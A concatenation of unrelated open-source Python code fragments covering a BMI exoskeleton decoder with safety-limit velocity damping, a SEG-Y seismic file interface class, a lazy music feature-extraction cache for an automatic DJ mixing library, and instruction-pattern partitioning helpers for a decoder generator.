for s, state in enumerate(['aa_vx', 'aa_vy', 'aa_vpsi']):
tmp = vel_bl_aa[s].copy()
vel_bl_aa[s] = self.command_lpfs[state](tmp)
if np.isnan(vel_bl_aa[s]):
vel_bl_aa[s] = 0
for s, state in enumerate(['rh_vthumb', 'rh_vindex', 'rh_vfing3', 'rh_vprono']):
tmp = vel_bl_rh[s].copy()
vel_bl_rh[s] = self.command_lpfs[state](tmp)
if np.isnan(vel_bl_rh[s]):
vel_bl_rh[s] = 0
#If the next position is outside of safety then damp velocity to only go to limit:
self.pre_safe_vel.append(np.hstack((vel_bl_aa, vel_bl_rh)))
pos_pred = current_state + 0.05*np.hstack((vel_bl_aa, vel_bl_rh))
pos_pred_aa = pos_pred[0:3]
pos_pred_rh = pos_pred[3:7]
#Make sure predicted AA PX, AA PY within bounds:
xy_change = True
x_tmp = self.safety_grid.is_valid_pos(pos_pred_aa[[0, 1]])
if x_tmp == False:
#d_pred = np.linalg.norm(self.safety_grid.interior_pos - pos_pred_aa[[0, 1]])
#d_curr = np.linalg.norm(self.safety_grid.interior_pos - self.plant_pos[t-1, [0, 1]])
# if d_pred < d_curr:
# xy_change = True
# else:
# xy_change = False
# vel_bl_aa[[0, 1]] = 0
current_pos = current_state[[0, 1]]
d_to_valid, pos_valid = self.safety_grid.dist_to_valid_point(current_pos)
vel_bl_aa[[0, 1]] = self.attractor_speed*(pos_valid - current_pos)/0.05
pos_pred_aa[[0, 1]] = current_pos + 0.05*vel_bl_aa[[0, 1]]
#print 'plant adjust: ', vel_bl_aa[self.aa_plant.aa_xy_ix], pos_pred_aa[self.aa_plant.aa_xy_ix]
xy_change = True
# Make sure AA Psi within bounds:
# If X/Y ok
if xy_change:
mn, mx = self.safety_grid.get_minmax_psi(pos_pred_aa[[0, 1]])
predx, predy, predpsi = pos_pred_aa[[0, 1, 2]]
# If x/y not ok:
else:
mn, mx = self.safety_grid.get_minmax_psi(self.plant_pos[t-1, [0, 1]])
predx, predy, predpsi = self.plant_pos[t-1, [0, 1, 2]]
# Set psi velocity :
psi_ok = False
if np.logical_and(pos_pred_aa[2] >= mn, pos_pred_aa[2] <= mx):
# Test if globally ok:
global_ok = self.safety_grid.global_hull.hull3d.find_simplex(np.array([predx, predy, pos_pred_aa[2]]))
if global_ok:
psi_ok = True
if psi_ok == False:
vel_bl_aa[2] = 0
#print 'stop psi vel: ', mn, mx, pos_pred_aa[self.aa_plant.aa_psi_ix]
# Make sure RH Prono within bounds (if SSM is only RH, use settings.starting_pos for AAPX, AAPY)
# If X/Y ok
if xy_change:
mn, mx = self.safety_grid.get_minmax_prono(pos_pred_aa[[0, 1]])
# If x/y not ok or not moving bc not part of state pace :
else:
mn, mx = self.safety_grid.get_minmax_prono(self.plant_pos[t-1, [0, 1]])
# Set prono velocity :
if np.logical_and(pos_pred_rh[3] >= mn, pos_pred_rh[3] <= mx):
pass
else:
tmp_pos = pos_pred_rh[3]
if tmp_pos < mn:
tmp = self.attractor_speed*(mn - tmp_pos)/0.05
elif tmp_pos > mx:
tmp = self.attractor_speed*(mn - tmp_pos)/0.05
else:
tmp = 0
vel_bl_rh[3] = tmp
# Assure RH fingers are within range:
for i, (ix, nm) in enumerate(self.rh_pfings):
mn, mx = self.safety_grid.get_rh_minmax(nm)
if np.logical_and(pos_pred_rh[ix] >= mn, pos_pred_rh[ix] <= mx):
pass
else:
if pos_pred_rh[ix] > mx:
tmp = self.attractor_speed*(mx - pos_pred_rh[ix])/0.05
elif pos_pred_rh[ix] < mn:
tmp = self.attractor_speed*(mn - pos_pred_rh[ix])/0.05
else:
tmp = 0
vel_bl_rh[ix] = tmp
return np.hstack((vel_bl_aa, vel_bl_rh))
def get_target_BMI_state(self, plant_pos, plant_vel, targ_pos, *args):
'''Run the goal calculator to determine the current target state.'''
current_state = np.hstack([plant_pos, plant_vel, 1])[:, None]
if np.any(np.isnan(current_state)):
current_state[np.isnan(current_state)] = 0
data, solution_updated = self.goal_calculator(targ_pos, self.state,
**dict(current_state=current_state))
target_state = data[0].reshape(-1, 1)
if np.any(np.isnan(target_state)):
target_state[np.isnan(target_state)] = 0
#target_state = np.hstack(( self.target_pos.values, [1]))
#target_state = target_state.reshape(-1, 1)
return np.tile(np.array(target_state).reshape(-1, 1), [1, self.dec.n_subbins])
import scipy.stats
import matplotlib.pyplot as plt
def plot_results(RRD):
### Raw Velocities ###
for i in range(7):
s, ii, r, p, e = scipy.stats.linregress(RRD.raw_vel[:-1, i], RRD.raw_command[:, i])
print 'raw vel: ', i, ', r2 = ', r**2
print ''
print ''
print ''
### Presafe Velocities ###
for i in range(7):
s, ii, r, p, e = scipy.stats.linregress(RRD.pre_safe_vel[:-1, i], RRD.pre_safe_command[:, i])
print 'presafe vel: ', i, ', r2 = ', r**2
#f, ax = plt.subplots()
#ax.plot(RRD.pre_safe_vel[:, i])
#ax.plot(RRD.pre_safe_command[:, i])
print ''
print ''
print ''
#### Proc Velocities ###
for i in range(7):
s, ii, r, p, e = scipy.stats.linregress(RRD.sent_vel[:-1, i], RRD.proc_command[:, i])
print 'proc vel: ', i, ', r2 = ', r**2
f, ax = plt.subplots()
ax.plot(RRD.proc_command[:, i])
ax.plot(RRD.sent_vel[:, i])
print ''
print ''
print ''
wsxy = np.array([0.5, ])
wpsi = np.array([0.01])
wsang = np.array([0.005])
ws = np.hstack((wsxy.reshape(-1, 1), wsang.reshape(-1, 1), wsang.reshape(-1, 1)))
def sweep_W(R, ws=ws):
ax = []
ax2 = []
for i in range(7):
f, axi = plt.subplots()
axi.plot(R.pre_safe_command[:, i], label='og, presafe')
ax.append(axi)
#f, axi = plt.subplots()
axi.plot(R.raw_command[:, i], label='og, raw')
#ax2.append(axi)
for i, (xy, psi, ang) in enumerate(ws):
R = change_W(R, xy, psi, ang)
R = def_LPF(R, 5)
R.run_decoder()
for j in range(7):
axi = ax[j]
axi.plot(R.raw_vel[:, j], label=str(xy)+','+str(ang)+' raw ')
#axi = ax2[j]
axi.plot(R.pre_safe_vel[:, j], label=str(xy)+','+str(ang)+' presafe ')
def change_W(RRD, w_vel_xy, w_vel_psi, w_vel_ang):
for i in [7, 8]:
RRD.dec.filt.W[i, i] = w_vel_xy
RRD.dec.filt.W[9, 9] = w_vel_psi
for i in [10, 11, 12]:
RRD.dec.filt.W[i, i] = w_vel_ang
return RRD
def def_LPF(RRD, lpf_cutoff):
fs_synch = 20
nyq = | |
<filename>pygeopressure/basic/seisegy.py
# -*- coding: utf-8 -*-
"""
class for interfacing with segy file.
Created on Feb. 7th 2018
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
__author__ = "yuhao"
from builtins import range, open
import json
from shutil import copyfile
from itertools import product
from future.utils import native
import segyio
import numpy as np
import pandas as pd
from tqdm.auto import tqdm
from .utils import methdispatch
from .vawt import wiggles, img
from .indexes import InlineIndex, CrlineIndex, DepthIndex, CdpIndex
from .survey_setting import SurveySetting
from .threepoints import ThreePoints
from . import Path
class SeiSEGY(object):
def __init__(self, segy_file, like=None):
"""
Parameters
----------
segy_file : str
segy file path
like : str, optional
created segy file has the same dimesions as like.
"""
self.segy_file = segy_file
self.inDepth = False # True if dataset Z is in Depth
self.property_type = None
if like is not None:
if Path(native(like)).exists() and not Path(native(self.segy_file)).exists():
copyfile(src=like, dst=self.segy_file)
if Path(native(self.segy_file)).exists():
self._parse_segy()
else:
raise Exception("File does not exist!")
@classmethod
def from_json(cls, json_file, segy_file=None):
"""
Initialize SeiSEGY from an json file containing information
Parameters
----------
json_file : str
json file path
segy_file : str
segy file path for overriding information in json file.
"""
with open(json_file, 'r') as fl:
json_object = json.load(fl)
segy = json_object["path"]
inDepth = json_object["inDepth"]
property_type = json_object["Property_Type"]
if segy_file:
segy = segy_file
instance = cls(native(segy))
instance.inDepth = inDepth
instance.property_type = property_type
return instance
def __str__(self):
return "SeiSEGY(inl[{},{},{}];crl[{},{},{}];z[{},{},{}])".format(
self.startInline, self.endInline, self.stepInline,
self.startCrline, self.endCrline, self.stepCrline,
self.startDepth, self.endDepth, self.stepDepth)
def _parse_segy(self):
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
self.startInline = segyfile.ilines[0]
self.endInline = segyfile.ilines[-1]
self.nEast = len(segyfile.ilines)
self.stepInline = (self.endInline - self.startInline) // \
(self.nEast - 1)
self.startCrline = segyfile.xlines[0]
self.endCrline = segyfile.xlines[-1]
self.nNorth = len(segyfile.xlines)
self.stepCrline = (self.endCrline - self.startCrline) // \
(self.nNorth - 1)
self.startDepth = segyfile.samples[0]
self.endDepth = segyfile.samples[-1]
self.nDepth = len(segyfile.samples)
self.stepDepth = (self.endDepth - self.startDepth) // \
(self.nDepth - 1)
inline_A = self.startInline
crline_A = self.startCrline
index_A = 0
x_A = segyfile.header[index_A][segyio.su.cdpx]
y_A = segyfile.header[index_A][segyio.su.cdpy]
inline_B = inline_A
crline_B = self.startCrline + 2 * self.stepCrline
index_B = 2
x_B = segyfile.header[index_B][segyio.su.cdpx]
y_B = segyfile.header[index_B][segyio.su.cdpy]
inline_C = self.startInline + 2 * self.stepInline
crline_C = crline_B
index_C = 2 * self.nNorth + 2
x_C = segyfile.header[index_C][segyio.su.cdpx]
y_C = segyfile.header[index_C][segyio.su.cdpy]
setting_dict = {
"inline_range": [
self.startInline, self.endInline, self.stepInline],
"crline_range": [
self.startCrline, self.endCrline, self.stepCrline],
"z_range": [
self.startDepth, self.endDepth, self.stepDepth, "unknown"],
"point_A": [inline_A, crline_A, x_A, y_A],
"point_B": [inline_B, crline_B, x_B, y_B],
"point_C": [inline_C, crline_C, x_C, y_C]
}
self.survey_setting = SurveySetting(ThreePoints(setting_dict))
def inlines(self):
"""
Iterator for inline numbers
Yields
------
int
inline number
"""
for inline in range(self.startInline, self.endInline+1, self.stepInline):
yield inline
def crlines(self):
"""
Iterator for crline numbers
Yields
------
int
cross-line number
"""
for crline in range(self.startCrline, self.endCrline+1, self.stepCrline):
yield crline
def inline_crlines(self):
"""
Iterator for both inline and crline numbers
Yields
------
tuple of int
(inline number, crossline number)
"""
for inline, crline in product(
range(self.startInline, self.endInline+1, self.stepInline),
range(self.startCrline, self.endCrline+1, self.stepCrline)):
yield (inline, crline)
def depths(self):
"""
Iterator for z coordinate
Yields
------
float
depth value
"""
for i in range(self.nDepth):
yield self.startDepth + i * self.stepDepth
def inline(self, inline):
"data of a inline section"
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
data = segyfile.iline[inline]
return data
def crline(self, crline):
"data of a crossline section"
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
data = segyfile.xline[crline]
return data
def depth(self, depth):
"data of a depth slice"
depth_idx = int((depth - self.startDepth) // self.stepDepth)
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
data = segyfile.depth_slice[depth_idx]
return data
def cdp(self, cdp):
"data of a cdp"
with segyio.open(self.segy_file, 'r') as segyfile:
segyfile.mmap()
data = segyfile.gather[cdp]
data = data.reshape((data.shape[-1],))
return data
@methdispatch
def data(self, indexes):
"""
Retrieve Data according to the index provided.
Parameters
----------
indexes : {InlineIndex, CrlineIndex, DepthIndex, CdpIndex}
index of data to retrieve
Returns
-------
numpy.ndarray
"""
raise TypeError("Unsupported Type")
@data.register(InlineIndex)
def _(self, indexes):
"""
data of a Inline section
Paramaters
----------
indexes : InlineIndex
Returns
-------
out : 2-d ndarray
of size nCrline * nDepth
"""
return self.inline(indexes.value)
@data.register(CrlineIndex)
def _(self, indexes):
"""
data of a Crossline section
Paramaters
----------
indexes : CrlineIndex
Returns
-------
out : 2-d ndarray
of size nInline * nDepth
"""
return self.crline(indexes.value)
@data.register(DepthIndex)
def _(self, indexes):
"""
data of a depth slice
Paramaters
----------
indexes : DepthIndex
Returns
-------
out : 2-d ndarray
of size nInline * nCrline
"""
return self.depth(indexes.value)
@data.register(CdpIndex)
def _(self, indexes):
"""
data of a cdp
Paramaters
----------
indexes : CdpIndex
Returns
-------
out : 1-d ndarray
of length nDepth
"""
return self.cdp(indexes.value)
def update(self, index, data):
"""
Update data with ndarray
Parameters
----------
index : InlineIndex
data : 2-d ndarray
data for updating Inline
"""
try:
if not isinstance(index, InlineIndex):
raise TypeError("has to be InlineIndex")
if data.shape != (self.nNorth, self.nDepth):
raise ValueError
with segyio.open(self.segy_file, 'r+') as segyfile:
segyfile.mmap()
segyfile.iline[index.value] = data
except Exception as er:
print(er.message)
@methdispatch
def plot(self, index, ax, kind='vawt', cm='seismic', ptype='seis'):
"""
Plot seismic section according to index provided.
Parameters
----------
index : {InlineIndex, CrlineIndex, DepthIndex, CdpIndex}
index of data to plot
ax : matplotlib.axes._subplots.AxesSubplot
axis to plot on
kind : {'vawt', 'img'}
'vawt' for variable area wiggle trace plot
'img' for variable density plot
cm : str
colormap for plotting
ptype : str, optional
property type
Returns
-------
matplotlib.image.AxesImage
"""
raise TypeError('Unsupported index type')
@plot.register(InlineIndex)
def _(self, index, ax, kind='vawt', cm='seismic', ptype='seis'):
data = self.data(index)
handle = None
if kind == 'vawt':
wiggles(data.T, wiggleInterval=1, ax=ax)
elif kind == 'img':
handle = img(data.T,
extent=[
self.startCrline, self.endCrline,
self.startDepth, self.endDepth],
ax=ax, cm=cm, ptype=ptype)
ax.invert_yaxis()
else:
pass
ax.get_figure().suptitle('In-line Section: {}'.format(index.value))
from matplotlib.offsetbox import AnchoredText
z_text = AnchoredText(
r"$\downarrow$Z",
loc=2, prop=dict(size=10), frameon=False,
bbox_to_anchor=(0., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(z_text)
inline_text = AnchoredText(
r"Cross-line $\rightarrow$ ",
loc=1, prop=dict(size=10), frameon=False,
bbox_to_anchor=(1., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(inline_text)
return handle
@plot.register(CrlineIndex)
def _(self, index, ax, kind='vawt', cm='seismic', ptype='seis'):
data = self.data(index)
handle = None
if kind == 'vawt':
wiggles(data.T, wiggleInterval=1, ax=ax)
elif kind == 'img':
handle = img(data.T,
extent=[
self.startInline, self.endInline,
self.startDepth, self.endDepth],
ax=ax, cm=cm, ptype=ptype)
ax.invert_yaxis()
else:
pass
ax.get_figure().suptitle('Cross-line Section: {}'.format(index.value))
from matplotlib.offsetbox import AnchoredText
z_text = AnchoredText(
r"$\downarrow$Z",
loc=2, prop=dict(size=10), frameon=False,
bbox_to_anchor=(0., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(z_text)
inline_text = AnchoredText(
r"In-line $\rightarrow$ ",
loc=1, prop=dict(size=10), frameon=False,
bbox_to_anchor=(1., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(inline_text)
return handle
@plot.register(DepthIndex)
def _(self, index, ax, kind='vawt', cm='seismic', ptype='seis'):
data = self.data(index)
handle = None
if kind == 'vawt':
wiggles(data.T, wiggleInterval=1, ax=ax)
elif kind == 'img':
handle = img(data.T,
extent=[
self.startInline, self.endInline,
self.startCrline, self.endCrline,],
ax=ax, cm=cm, ptype=ptype)
ax.invert_yaxis()
else:
pass
ax.get_figure().suptitle("Z slice: {}".format(index.value))
from matplotlib.offsetbox import AnchoredText
z_text = AnchoredText(
r"$\downarrow$Cross-line",
loc=2, prop=dict(size=10), frameon=False,
bbox_to_anchor=(0., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(z_text)
inline_text = AnchoredText(
r"In-line $\rightarrow$ ",
loc=1, prop=dict(size=10), frameon=False,
bbox_to_anchor=(1., 0.),
bbox_transform=ax.transAxes)
ax.add_artist(inline_text)
return handle
def valid_cdp(self, cdp_num):
"Return valid CDP numbers nearest to cdp_num"
inl_num, crl_num = cdp_num
n_inline = (inl_num - self.startInline) // self.stepInline
in_plus_one = round(((inl_num - self.startInline) % self.stepInline) / \
self.stepInline)
inline = self.startInline + (n_inline + in_plus_one) * self.stepInline
n_crline = (crl_num - self.startCrline) // self.stepCrline
cr_plus_one = round(((crl_num - self.startCrline) % self.stepCrline) / \
self.stepCrline)
crline = self.startCrline + (n_crline + cr_plus_one) * self.stepCrline
return (inline, crline)
def to_gslib(self, attr, fname, cdps=None):
"""
Output attributes to a gslib data file.
A description of this file format could be found on
'http://www.gslib.com/gslib_help/format.html'
attr : str
attribute name
fname : str
file name
cdps : list of tuples
cdps to export
"""
try:
if cdps is None:
info = "Number of cells: [{},{},{}] ".format(
self.nEast, self.nNorth, self.nDepth) + \
"Cell dimensions: [{},{},{}] ".format(
self.stepInline, self.stepCrline, self.stepDepth) + \
"Origin: [{}, {}, {}]".format(
self.startInline, self.startCrline, self.startDepth)
with open(fname, 'w') as fout:
fout.write("{}\n4\nx\ny\nz\n{}\n".format(info, attr))
nInline = len(list(self.inlines()))
for i, inl in enumerate(
tqdm(self.inlines(), total=nInline, ascii=True)):
data_per_inline = self.inline(inl).flatten()
inline_per_inline = [inl] * data_per_inline.shape[0]
crline_per_inline = np.array(
[[cl]*self.nDepth for cl in self.crlines()]).flatten()
depth_per_inline = np.array(
[d for d in self.depths()] * self.nNorth).flatten()
temp_frame = pd.DataFrame(
{'col1': inline_per_inline,
'col2': crline_per_inline,
'col3': depth_per_inline,
'col4': data_per_inline})
temp_frame.to_csv(
fname, mode='a', index=False, sep=str(' '),
header=False)
else:
info = "CDPs: {}".format(cdps)
with open(fname, 'w') as fout:
fout.write("{}\n4\nx\ny\nz\n{}\n".format(info, attr))
for cdp in tqdm(cdps, ascii=True):
data_per_cdp = self.cdp(cdp)
depth_per_cdp = list(self.depths())
n_depth = len(list(self.depths()))
inl, | |
<gh_stars>10-100
"""
Container for the class Track
"""
import collections
import copy
import logging as log
import os
import time
from typing import List
import librosa
import numpy as np
from pkg_resources import resource_filename
from automix import config
from automix.model.inputOutput.serializer.featureSerializer import \
FeatureSerializer
# TODO:
# handle parameters training
class featuresGetter(dict):
"""
Lazy loader of features
Implements dict and call the estimator if the key is known but no value is cached.
"""
def __init__(self, filename):
"""
-filename: name/path of the track used to infer the path of the cache0
"""
self._path = filename
self["path"] = filename # TODO This is not explicit and hard to understand
self._estimators = self.getExecutionGraph()
super().__init__()
def getExecutionGraph(self):
"""
Create the graph containing all the estimators usable and the link of dependency between them
"""
# TODO: Do we use estimators instead of string for dependance ?
# The dependance doesn't know which parameter was set for the input.
from automix.featureExtraction.lowLevel.readFile import ReadFile, GetDuration
from automix.featureExtraction.lowLevel.cqt import Cqt
from automix.featureExtraction.lowLevel.pcp import Pcp
from automix.featureExtraction.lowLevel.coreFinder import CoreFinder
from automix.featureExtraction.lowLevel.replayGain import ReplayGain
from automix.featureExtraction.lowLevel.onsetDetection import OnsetDetection
from automix.featureExtraction.lowLevel.windowing import Windowing
from automix.featureExtraction.structure.msafProxy import MsafProxy
from automix.featureExtraction.beats.madmomBeatDetection import MadmomBeatDetection
from automix.featureExtraction.harmonicPercussiveClassification.hpss import Hpss
from automix.featureExtraction.vocalSeparation.vocalMelodyExtraction import VocalMelodyExtraction
from automix.featureExtraction.automaticDrumsTranscription.madmomDrumsProxy import MadmomDrumsProxy
import automix.featureExtraction.novelty as n
import automix.featureExtraction.lowLevel as ll
estimators: List[fe.Estimator] = [
ReadFile(),
GetDuration(),
MadmomBeatDetection(parameterSnapDistance=0.05),
VocalMelodyExtraction(),
Hpss(),
MadmomDrumsProxy(),
Cqt(parameterBinNumber=84, parameterScale="Perceived dB", outputCqt="cqtPerceiveddB"),
Pcp(parameterNieto=True),
Pcp(parameterNieto=False, outputPcp="chromagram"),
CoreFinder(),
MsafProxy(algorithm="scluster", feature=None, outputSignal="msaf-scluster"),
MsafProxy(algorithm="sf", feature="cqt", outputSignal="msaf-sf"),
MsafProxy(algorithm="olda", feature=None, outputSignal="msaf-olda"),
ReplayGain(inputGrid=None),
OnsetDetection()
]
def getPeakWorkflow(feature, sparse=False, windowPanning=0, forceRefreshCache=False, addZeroStart=True):
"""
Create the graph of nodes to retreive the peaks from any feature.
- You can specify if the feature is parse: the aggregation of the quantization will be based on the sum instead of the
RMSE
- You can specify the panning of the window of the quantization in percentage of a strongbeat
- You can specify a name. If not, the name will be the name of the feature
- You can forceRefreshCache to compute again cached features (to be used if any extractor has been updated)
"""
name = feature
featureEstimators = [
Windowing(inputSamples=feature,
inputGrid="strongBeats",
output=name + "RMSE",
parameterAggregation="sum" if sparse else "rmse",
parameterPanning=windowPanning,
parameterSteps=1,
forceRefreshCache=forceRefreshCache),
ll.Normalize(inputSamples=name + "RMSE",
outputNormalizedSamples=name + "RMSENormalized",
forceRefreshCache=forceRefreshCache),
n.Checkerboard(
inputSamples=name + "RMSENormalized", # Checkerboard can be removed as it is replaced in getFeatureW
outputNovelty=name + "Checkerboard",
parameterAddZerosStart=addZeroStart,
forceRefreshCache=forceRefreshCache,
parameterWindowSize=16) # parameterWindowSize=16*8, forceRefreshCache=False),
]
return featureEstimators
estimators += getPeakWorkflow("samples")
estimators += getPeakWorkflow("chromagram", addZeroStart=False)
estimators += getPeakWorkflow("pcp", addZeroStart=False)
estimators += getPeakWorkflow("cqtPerceiveddB", addZeroStart=False)
estimators += getPeakWorkflow("harmonic")
estimators += getPeakWorkflow("percussive")
estimators += getPeakWorkflow("kick", sparse=True, windowPanning=0.21)
estimators += getPeakWorkflow("snare", sparse=True, windowPanning=0.21)
estimators += getPeakWorkflow("hihat", sparse=True, windowPanning=0.21)
def getFeatureW(features,
topPeaks=[None],
salienceThreshold=[0.4],
relativeDistance=[1],
inputSalience=["kickRMSENormalized", "harmonicRMSENormalized", "percussiveRMSENormalized"]):
"""
Get estimators for the peak picking for the features and parameters in features
"""
w = []
# Add all the novelty curves and independent peak picking
for feature in features:
# c = Checkerboard(inputSamples=feature + "RMSENormalized", outputNovelty=feature + "Checkerboard")
# c.parameters["addZerosStart"].fitStep = parameters[0] # [False, True]
# c.parameters["windowSize"].fitStep = parameters[1] # [8,32]
pp = ll.PeakPicking(inputSignal=feature + "Checkerboard", outputPeaks=feature + "CheckerboardPeaks")
pp.parameters["relativeThreshold"].fitStep = [0.3] # parameters[2] # [0.1,0.3]
pp.parameters["minDistance"].fitStep = [4] # parameters[3] # [8,32]
w += [pp]
# Compute the periodicity: 8 SB = 4 bars
p = ll.Periodicity(inputFeatures=[feature + "Checkerboard" for feature in features])
p.parameters["period"].fitStep = [8]
p.parameters["featureAggregation"].fitStep = ["quantitative"] # ["quantitative", "qualitative"]
p.parameters["distanceMetric"].fitStep = ["RMS"] # ["RMS", "sum", "Veire"]
w.append(p)
# Quantize the beats to the periodicity
for feature in features:
q = ll.Quantize(inputSignal=feature + "CheckerboardPeaks", outputSignal=feature + "Quantized")
q.parameters["maxThreshold"].fitStep = [0]
w += [q]
# Get the top peaks + minimum salience
ps = ll.PeakSelection(inputPeaks=[feature + "Quantized" for feature in features],
inputSalience=inputSalience,
parameterMergeFunction=np.mean)
ps.parameters["absoluteTop"].fitStep = topPeaks
ps.parameters["salienceTreshold"].fitStep = salienceThreshold
ps.parameters["relativeDistance"].fitStep = relativeDistance
w.append(ps)
return w
#"samples", "chromagram",
estimators += getFeatureW(
["pcp", "cqtPerceiveddB", "harmonic", "percussive", "kick", "snare", "hihat"],
inputSalience=["harmonicRMSENormalized"],
salienceThreshold=[0.4], #0.4 TODO: make that clear ?
topPeaks=[None],
relativeDistance=[1])
# from automix.model.inputOutput.serializer import GraphvizSerializer
# GraphvizSerializer().serializeEstimators(estimators)
return estimators
def __getitem__(self, key):
return self.getItem(key)
def getItem(self, key):
"""
Returns the feature from RAM.
If it's not here, it searchs it on disk and put it in RAM and returns it.
If it's not here, computes the feature, puts it on disk and RAM and returns it.
The method is not pure, but it is so much easier like that
"""
from automix import config
# If an estimator has an input set to None
if key is None:
return
# Search in RAM
if self.__contains__(key) and super().__getitem__(key) is not None: #TODO add estimator.forceRefreshCache == False?
return super().__getitem__(key)
# Search on disk
estimator = self.getEstimator(key) # Get the estimator known to compute this feature
forceRefresh = estimator is not None and estimator.forceRefreshCache
cache = self.getCache(key, estimator)
if cache is not None and not forceRefresh:
self[key] = cache
# if config.CACHE_LEVEL >= estimator.cachingLevel:
# self.setCache(key, estimator, cache)
return cache
# Computes the feature
computed = self.computeFeature(estimator)
estimator.forceRefreshCache = False #TODO this is to prevent multiple computation of a root estimator haveing multiple child
for i, subKey in enumerate(estimator.outputs): # an estimator has multiple outputs
if config.CACHE_LEVEL >= estimator.cachingLevel:
self.setCache(subKey, estimator, computed[i])
self[subKey] = computed[i]
return self[key]
def computeFeature(self, estimator):
"""
Retreive the feature by running the computation of the estimator
The estimator executed might need more data which will run more estimators if needed
"""
# Run the estimator by searching for the input
# TODO this can create an infinite loop
input = [[self.getItem(f) for f in feature] if isinstance(feature, list) else self.getItem(feature)
for feature in estimator.inputs]
log.debug("computing " + str(estimator) + "->" + str(estimator.outputs) + " ...")
timerStart = time.process_time()
result = estimator.predictOne(*input)
log.debug(str(np.round(time.process_time() - timerStart, decimals=2)) + "s")
return result
def getEstimator(self, key):
"""Get the estimator known to compute this feature"""
estimator = [e for e in self._estimators if key in e.outputs]
if len(estimator) > 1:
raise Exception("graph of computation is not correct")
elif len(estimator) == 0:
return None
return estimator[0]
def propagateForceRefreshCache(self, estimator):
"""
set the refresh to True for the estimator and all the following estimators later in the computational graph
"""
estimator.forceRefreshCache = True
for output in np.hstack(estimator.outputs):
self.pop(output, None)
for e in [e for e in self._estimators if output in np.hstack(e.inputs)]:
self.propagateForceRefreshCache(e) #TODO: Slow computation..
def getCache(self, key, estimator):
"""
retrieve the cached data of the feature for this track or return None
"""
cachePath = self.getCachePath(key)
cache = FeatureSerializer.deserialize(cachePath)
if cache is not None and cache["estimator"] == str(estimator):
return cache["value"]
else:
return None
def setCache(self, key, estimator, value):
"""
Set the data in cache.
Uses the feature's name and the estimator (with parameters) to discriminate the stored informaiton
"""
cachePath = self.getCachePath(key)
FeatureSerializer.serialize(cachePath, {"estimator": str(estimator), "value": value})
def getCachePath(self, key):
return resource_filename("automix", config.CACHE_LOCATION + config._getFilename(self._path) + "." + key + ".json")
class Track(object):
'''
Class used as a data structure associated with a track.
We store all the metadata/features of the track here.
Try to keep all the units in seconds or beats
use the TrackBuilder to instantiate it
'''
def __init__(self, path="", name="", sourceType="", length=100, position=0, soffs=0, playRate=1, populateFeatures=True):
# features extracted
if populateFeatures:
self.features = featuresGetter(path) # features dictionnary from the MIR estimators
# metadatas for the player
self.path = path # Path to the audio
self.name = name if name != "" else config._getFilename(path) # name of the music
self.sourceType = sourceType if sourceType else self.getSourceType() # sourceType for Reaper (see Track.getFileType)
# length of the track actually played by the player (it can be less or more than the duration)
self.length = length
# location of the item in the deck (global timestamp)
self.position = position
self.soffs = soffs # Start in source
self.playRate = playRate # playback rate in ratio. 0.5 is half the speed
self.preservePitch = 0 # boolean saying if the pitch should be preserved when changing the playback rate
# fade in and out of the track without using the deck effects NOT supported by everything.
self.fadeIn = 0.01
self.fadeOut = 0.01
self.stretchMarkers = [] | |
= [ (trimmed_vals,ii) ]
else:
d[ other ].append((trimmed_vals,ii) )
#msge("RETURNING FROM PARTITION: %s" % ( str(d.keys())))
return (d, list(all_values.keys()) )
def all_same_operand_decider(ilist,bitpos):
"""Return false if not all of the next bits are the same
operand-decider, also return operand decider if True"""
last = None
for i in ilist:
plen = len(i.ipattern.bits)
if bitpos >= plen:
#msge("Fell off end of bits")
return (False,None)
# They can have different required values, but they must be the
# same deciding token.
if i.ipattern.bits[bitpos].is_operand_decider():
if last == None:
last = i.ipattern.bits[bitpos]
elif last.token != i.ipattern.bits[bitpos].token:
return (False, None)
else:
return (False, None) # not an operand decider
if last:
return (True, last)
return (False, None)
def all_same_nonterminal(ilist,bitpos):
"""Return false if not all of the next bits are the same
nonterminal, also return nonterminal if True"""
last_nonterminal = None
for i in ilist:
plen = len(i.ipattern.bits)
if bitpos >= plen:
#msge("Fell off end of bits")
return (False,None)
if i.ipattern.bits[bitpos].is_nonterminal():
if last_nonterminal == None:
last_nonterminal = i.ipattern.bits[bitpos]
elif last_nonterminal != i.ipattern.bits[bitpos]:
#msge("Differing NTs: [" + str(last_nonterminal)+ "] vs ["
#+ str(i.ipattern.bits[bitpos]) + ']')
return (False, None)
else:
#msge("Not a nonterminal")
return (False, None) # not a nonterminal
if last_nonterminal:
return (True, last_nonterminal)
return (False, None)
def move_candidate_od_to_front(bitpos, candidate_od, bit_info_t_list):
"""Move a speicific od names candidate_od from wherever it is in
the list (after bitpos) to the location bitpos"""
found = False
for i,b in enumerate(bit_info_t_list[bitpos+1:]):
if b.is_operand_decider():
if b.token == candidate_od:
found = True
badpos = i + bitpos + 1
if found:
# move bit_info_t_list[badpos] to just before bitpos
if vrearrange():
msge("BEFORE REARRANGE: bitpos = %d and badpos = %d" %
(bitpos, badpos))
for b in bit_info_t_list:
msge( "\t" + str(b) )
z = bit_info_t_list[badpos]
del bit_info_t_list[badpos]
bit_info_t_list.insert(bitpos,z)
if vrearrange():
msge("AFTER REARRANGE:")
for b in bit_info_t_list:
msge( "\t" +str(b) )
return found
def renumber_one_ipattern(i):
bitpos = 0
for p in i.ipattern.bits:
p.pbit = bitpos
bitpos = bitpos + 1
def renumber_bitpos(ilist):
for i in ilist:
renumber_one_ipattern(i)
def rearrange_at_conflict(ilist,bitpos):
"""Try to rearrange ODs at a conflict"""
# build up a list of candidate ods
# FIXME 2008-11-12 <NAME>: could search for all sequential
# ODs rather than just one neighboring OD.
candidate_ods = []
for i in ilist:
if bitpos >= len(i.ipattern.bits):
return False
if i.ipattern.bits[bitpos].is_operand_decider():
t = i.ipattern.bits[bitpos].token
if t not in candidate_ods:
candidate_ods.append(t)
# look ahead one spot too...
nbitpos = bitpos+1
if nbitpos < len(i.ipattern.bits):
if i.ipattern.bits[nbitpos].is_operand_decider():
